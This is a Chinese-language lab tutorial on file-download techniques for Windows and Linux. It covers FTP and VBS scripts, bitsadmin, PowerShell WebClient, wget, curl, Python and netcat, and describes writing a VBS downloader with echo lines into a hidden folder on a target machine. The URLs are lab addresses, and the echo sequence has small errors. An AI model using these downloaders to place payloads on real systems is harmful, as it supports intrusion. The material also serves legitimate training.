声明:本文介绍的技术仅供网络安全技术人员及白帽子使用,任何个人或组织不可传播相关技术及工具从事违法犯罪行为,一经发现直接上报国家安全机关处理
window系统常见下载方式
FTP脚本
vbs脚本
bitsadmin命令
$client命令
Linux系统常见下载方式
wget
curl
lynx
fetch
Axel
aria2
youtube-dl
双方均可用
links
links2
python脚本
nc
由于使用方法都差不多这里就不全都演示了,不会的可自行百度
实验环境:
- Windows Server 2008 R2 x64
- IIS服务器
- kali
环境搭建:
安装IIS服务器
在C:\inetpub\wwwroot
网站目录下放一个www.rar文件并且浏览器能够访问到
模拟实验:
Windows命令下载方式
1、FTP脚本实现下载
用echo生成txt文件,ip用户名密码均为目标机的,如下:
输入ftp -s:ftp.txt
执行该文件,成功下载1.rar
2、vbs脚本实现下载
在桌面创建一个文件夹将vbs脚本放进去,注意修改路径。代码如下:
Set xPost=createObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://192.168.70.128/www.rar",0
xPost.Send()
set sGet=createObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write(xPost.ResponseBody)
sGet.SaveToFile "C:\Users\sq\Desktop\a\www.rar",2
然後双击执行,压缩文件就被下载了
但人家电脑里不会有这种文件需要你自己生成,方法如下:
进入到一个隐蔽的文件夹,然后用echo语句按顺序输入代码生成vbs脚本,如:
echo Set xPost=createObject("Microsoft.XMLHTTP")>>b.vbs
echo xPost.Open "GET","http://192.168.70.128/www.rar",0 >>b.vbs
echo xPost.Send()>>b.vbs
echo set sGet=createObject("ADODB.Stream")>>b.vbs
echo sGet.Mode=3>>b.vbs
echo sGet.Type=1>>b.vbs
echo sGet.Open()>>b.vbs
echo sGet.Open()>>b.vbs
echo sGet.SaveToFile "C:\Users\sq\Desktop\a\www.rar",2 >>b.vbs
脚本生成后输入cscript a.vbs
执行就可以下载了
3、bitsadmin命令下载
环境同上,直接输入bitsadmin /transfer n http://192.168.70.128/www.rar C:\Users\sq\Desktop\a\www.rar
即可实现下载
成功下载
4、$client命令下载
环境同上,在搜索框中输入p然后以管理员身份运行poershell在命令行中依次打入client = new-object System.Net.WebClientclient.DownloadFile('http://192.168.70.128/www.rar','C:\Users\sq\Desktop\www.rar')前面是网站路径,后面是保存路径,文件名可换
Linux命令下载方式
1、wget命令下载
这个使用起来很简单,直接输入wget+网址就可以了,加-p参数还可以指定文件夹,如果文件夹不存在会自动创建
2、curl命令下载
这个命令需要在网址后加–output参数,后面跟文件名即可
3、python脚本实现下载
创建一个xiazai.py文件修改地址然后执行即可,python代码如下:
#!/usr/bin/python
import urllib2
u = urllib2.urlopen('http://192.168.70.128/www.rar')
localFile = open('1.rar', 'w')
localFile.write(u.read())
localFile.close()
4、nc命令下载
这个方法需要两台机器都有nc,然后目标服务器开放端口,自己在进行接收就可以了,方法如下:
我们开启两个终端,当做是两台服务器,目标端输入cat 1.rar | nc -lvvp 1234
开始监听,本地输入nc 127.0.0.1 1234 > 1.rar
接收
注意:这里因为是一台机器演示所以用127.0.0.1,真实情况换成网站地址或ip即可,还有执行完后它不会自动退出,你感觉下载完了就Ctrl+C终止
下完后我们可以ls -l
看一下文件字节数是否相同